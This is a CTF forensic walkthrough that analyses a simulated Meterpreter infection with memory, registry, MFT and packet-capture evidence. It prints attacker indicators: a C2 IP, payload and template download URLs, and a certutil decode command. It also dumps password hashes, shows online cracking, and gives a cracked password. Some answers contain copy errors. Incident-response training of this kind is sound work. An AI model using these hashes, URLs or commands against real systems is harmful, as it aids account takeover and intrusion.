Cyber Polygon Part 1 - Forensic Analysis CTF

Intro

The first in a two part series CyberDefenders.org, have a fun forensic CTF. The objective is to answer a series of typical incident response questions surrounding a malware infection.

You are provided with the followiing files to aid in your analysis:

• memory dump
• partial registry dump
• copy of the NTFS $MFT
• 2x packet captures
• Windows event logs (evtx)

Walkthrough

1) What is the build number (in the format ddddd, where each d is a single decimal number, for example - 12345) of the installed Windows version?

python2 ./vol.py -f ~/Downloads/CyberPolygon_Forensic_Artifacts/memdump.mem imageinfo

          Suggested Profile(s) : Win10x64_17134, Win10x64_14393, Win10x64_10586, Win10x64_16299, Win2016x64_14393, Win10x64_17763, Win10x64_15063 (Instantiated with Win10x64_15063)
                     AS Layer1 : SkipDuplicatesAMD64PagedMemory (Kernel AS)
                     AS Layer2 : FileAddressSpace (/Users/apdavies03/Downloads/CyberPolygon_Forensic_Artifacts/memdump.mem)
                      PAE type : No PAE
                           DTB : 0x1aa002L
                          KDBG : 0xf8002003a520L
          Number of Processors : 2
     Image Type (Service Pack) : 0
                KPCR for CPU 0 : 0xfffff8001ed49000L
                KPCR for CPU 1 : 0xffff9c01cb3e0000L
             KUSER_SHARED_DATA : 0xfffff78000000000L
           Image date and time : 2020-06-20 19:48:43 UTC+0000
     Image local date and time : 2020-06-20 12:48:43 -0700

Moving forward we need to apply the following profile to the vol.py command to correct parse the memory image

--profile=Win10x64_17134 

Answer:

17134

2) What is the parent process PID of the process, that accepts incoming network connections on the port 1900/UDP?

$ python2 ./vol.py -f ~/Downloads/CyberPolygon_Forensic_Artifacts/memdump.mem --profile=Win10x64_17134 netscan
...
0xcd83ffc3a2f0     UDPv6    ::1:1900                       *:*                                   4688     svchost.exe    2020-06-20 18:36:22 UTC+0000

But we are after the parent of 4688:

python2 ./vol.py -f ~/Downloads/CyberPolygon_Forensic_Artifacts/memdump.mem --profile=Win10x64_17134 pstree > ps.txt
grep 4688 ps.txt 
.. 0xffffcd83ffc5c580:svchost.exe                    4688    648      6      0 2020-06-20 18:36:22 UTC+0000

Answer:

648

3) What is the IP address of the attacker command and control center, the connection with which was still active at the time of forensic artifacts acquisition?

From the netstat dump, we are looking for established connections to foreign IPs

0xcd840169d2f0     TCPv4    192.168.184.130:50133          196.6.112.70:443     ESTABLISHED      -1    

Answer:

196.6.112.70

4) What is the PID of the process where malicious code was located at the moment of forensic artifacts acquisition?

$ python2 ./vol.py -f ~/Downloads/CyberPolygon_Forensic_Artifacts/memdump.mem --profile=Win10x64_17134 pstree

 0xffffcd840106d580:winlogon.exe                     3232   6064      7      0 2020-06-20 19:28:44 UTC+0000
. 0xffffcd84012a84c0:cmd.exe                         5224   3232      0 ------ 2020-06-20 19:29:54 UTC+0000
. 0xffffcd8401109580:fontdrvhost.ex                  4852   3232      5      0 2020-06-20 19:28:44 UTC+0000
. 0xffffcd83ffef2580:userinit.exe                    1748   3232      0 ------ 2020-06-20 19:28:55 UTC+0000
...
... 0xffffcd84020d0580:powershell.exe                9188   5472     12      0 2020-06-20 19:38:52 UTC+0000
.... 0xffffcd84020e9580:conhost.exe                  9204   9188      5      0 2020-06-20 19:38:52 UTC+0000
... 0xffffcd8401779580:MSASCuiL.exe                  1012   5472      3      0 2020-06-20 19:29:09 UTC+0000
... 0xffffcd84005de580:WINWORD.EXE                   7312   5472      0 ------ 2020-06-20 19:47:01 UTC+0000
... 0xffffcd84010ba080:OneDrive.exe                  4572   5472     24      0 2020-06-20 19:29:12 UTC+0000
... 0xffffcd83fe8b2580:vmtoolsd.exe                  6624   5472      9      0 2020-06-20 19:29:10 UTC+0000
. 0xffffcd83febcf580:cmd.exe                         3928   3232      0 ------ 2020-06-20 19:34:27 UTC+0000
. 0xffffcd8400e37080:cmd.exe                          288   3232      0 ------ 2020-06-20 19:33:00 UTC+0000
. 0xffffcd83fecff080:dwm.exe                         8100   3232     11      0 2020-06-20 19:28:44 UTC+0000

Answer:

3232

5) On a compromised system, malicious code, discovered in the previous step, is launched every system start, since the attacker has used one of the persistence techniques. So, what is the name of the autostart entry (those part, that is directly responsible for code execution), used by the attacker for persistence?

Use the Logs - WMI-Activity-Operational, search for the malware path to id the service (EventID 5861)

To make this question even easier, we even patched and made a pull request to Sans-DeepBlueCLI

Answer:

LogRotate Consumer

6) The autostart entry from the previous step is used to launch the script, which in turn leads to the malicious code execution in the memory of the process, which is discussed in question 4. This code is extracted by script from some system place in the encoded form. The decoded value of this string is executable PE-file. How did Microsoft Antivirus detect this file on 2020-06-21?

Easy enough - once you’ve answered question 8

Upload the samples hash to VirusTotal

Trojan:Win64/Meterpreter.E

7) The process, mentioned in the question 4, isn’t the initial process, where malicious code, described in the previous question, was executed by script from autostart. What is the name of the initial process (in the format program.exe), that is spawned by autostart script and used for further malicious code execution, that subsequently migrates to the address space of the process, mentioned in the question 4.

Look back at the pstree (Process Tree) from earlier

. 0xffffcd83fecff080:dwm.exe                         8100   3232     11      0 2020-06-20 19:28:44 UTC+0000

Answer:

dwm.exe

8) The autostart entry from the previous step is used to launch the script, which in turn leads to the malicious code execution in the memory of the process, which is discussed in question 4. Provide the URL, which was used to download this script from the Internet during the host compromise. The script that runs at each system star (which is described in question 6) was downloaded to the compromised system from the Internet. Provide the URL, which was used to download this script

This was more difficult, first we dumped the memory of the child powershell processes (knowing the loader was a powershell script in memory), then we grepped for odd URL strings

egrep "https://...\..................\..../.*"
...
https://raw.githubusercontent.com/xia33F/APT/master/payloads/wrapper_page

9) The system was compromised as the result of a Microsoft Office document opening, received by email. What is MD5 hash of this document (for example, d41d8cd98f00b204e9800998ecf8427e)?

For this challenge, we utilised Wireshark, used the filter “SMTP”, and traversed all the SMTP streams until we found several attachments (word doc, zip file, pdf) as a base64 encoded attatchment. Simply copy and paste the base64 code to file and base64 decode, check the file type and further unwrap the contintainers

base64 -d b64_file > filedecoded
file filedecoded
 ZIP
mv filededcoded filedecoded.zip
unzip filedecoded.zip
Why Saudi Arabia Will Lose The Next Oil Price War.docx
md5 Why Saudi Arabia Will Lose The Next Oil Price War.docx

Answer:

aa7ee7f712780aebe9136cabc24bf875

10) The document, that was initially opened by user, didn’t contain anything malicious itself. It downloaded another document from the Internet as a Microsoft Word template. Malicious code, which has led to the system compromise, is located inside this template directly. What link was used by the first document to download the second document as a template (for example, https://address/file.com)?

Open the pdf in a sandbox or use Didier Stevens ole tools

http://75.19.45.11/Supplement.dotm

11) During the post-exploitation attacker delivered to the compromised host a special Active Directory Enumeration utility. Which link did the attacker use to download this utility (for example, https://address/file.com)?

Using the Mitre att&ck matrix, a common tool is certutil, there are two ways to attack this question

• 1) Look at the pcap (traffic_2.pcapng) - HTTP filter and look for the following useragent

  Useragent "Microsoft-CryptoAPI/10.0" (http.user_agent == "Microsoft-CryptoAPI/10.0")
  Follow stream: tcp.sream eq 102
  Note the destination IP/URL
  

• 2) Carve the powershell process memory dump for certutil

  $ strings 3232.dmp|grep certutil
  4certutil -decode %tmp%\disco.jpg:sh %tmp%\sh.exe
  ;from the open (netstat) connections we know the IP is 196.6.112.70
  

  Answer:

   http://196.6.112.70/disco.jpg
  

12) As described in the previous question utility has created several files in the compromised system, that subsequently were deleted by an attacker. One of the created files had a bin extension. What is the name of this file (for example, name.bin)?

Two ways todo this:

• 1)Parse the MFT and grep for .bin files analyzeMFT

  virtualenv -p /opt/local/bin/python2.7 venv
  python ./setup.py build
  python ./setup.py install
  python ./analyzeMFT.py -f ~/Downloads/CyberPolygon_Forensic_Artifacts/\$MFT.copy0 -o dump.csv
  grep -v -i microsoft|grep ".bin" 
  ...
  2020-06-20|19:31:38.501654|TZ|...B|FILE|NTFS $MFT|$FN [...B] time|user|host|/Windows/Temp/ODNhN2YwNWUtYWFmYy00MDVmLWFhYTQtNGMzM2Q3NmYwMWM4.bin|desc|version|/Windows/Temp/ODNhN2YwNWUtYWFmYy00MDVmLWFhYTQtNGMzM2Q3NmYwMWM4.bin|7||format|extra
  

• 2)Analyse the prefetch files with PECmd.exe

On Windows:
PECMD -f Prefetch\SH.EXE-89D7F45B.pf
...
113: \VOLUME{... \TEMP\ODNHN2YWNWUTYWFMYY00MDVMLWFHYTQTNGMZM2Q3NMYWMWM4.BIN

Answer:

 ODNHN2YWNWUTYWFMYY00MDVMLWFHYTQTNGMZM2Q3NMYWMWM4.BIN

13) As described in the previous question utility has created several files in the compromised system, that subsequently were deleted by an attacker. One of the created files had a bin extension. What is the name of this file (for example, name.bin)?

During the post-exploitation attacker has compromised a privileged user account. What is its password?

python2 ./vol.py -f ~/Downloads/CyberPolygon_Forensic_Artifacts/memdump.mem --profile=Win10x64_17134 hashdump > hashes.txt
Volatility Foundation Volatility Framework 2.6.1
Administrator:500:63424d100a5717b0661f84ae789b82bd:34103925bb9f07248d0b3d3df50c9d4c:::
Guest:501:eddee9c278b95cf3880300ca22eddda0:06adfd21dc6db22b5ef3743b1b8c022b:::
DefaultAccount:503:3ac68f2d31f869d98fa5db8b9c405af1:b80c069e17138971f4d183f9d575ccb4:::
WDAGUtilityAccount:504:8c1c4c3110d3075c5e1b33fc5e3b30f0:899aa6ec601d70d34fb994c27ed93123:::
John Goldberg:1001:7d80c4bfe8857c6ec676aa3577e89e68:f7b1dce8a4445aea38d6a735ae0bf754:::
backupsrv:1003:291f7bc51dde8a64063b565c68579d95:0e651bf56065b19f5783bb59ad6e8bfc:::

Then use your cracking program or search the cracked hashes online we used https://crackstation.net/

Answer:

 !!feb15th2k6!!

14) What is the name of the tool (for example, program.exe), that probably was used by an attacker to compromise the user account?

Since we know the powershell script, loads a registry value from the registry, we can assume the attacker used the following command:

Answer:

reg.exe

15) The attacker used a compromised account for unauthorized Domain Controller access. What is the IP address of this Domain Controller?

Again two ways to do this:

• 1) Wireshark with SMB filter (traffic_2.pcapng)
• 2) Use volatility as we know the workstation is domain joined there is likely an established connection over SMB(445)

  $ python2 ./vol.py -f ~/Downloads/CyberPolygon_Forensic_Artifacts/memdump.mem --profile=Win10x64_17134 netscan|grep 192.168.184.100 
  0xcd83fec7f700     TCPv4    192.168.184.130:50368          192.168.184.100:445  ESTABLISHED      -1   
  

  Answer

   192.168.184.100
  

Tools

Here is the list of tools used in our analysis:

• Volatility 2 Python2.7 version
• Volatility-autoruns
• Volatility-Winesap
• PECmd.exe
• analyzeMFT
• Wireshark
• DeepBlueCLI

---

Share on: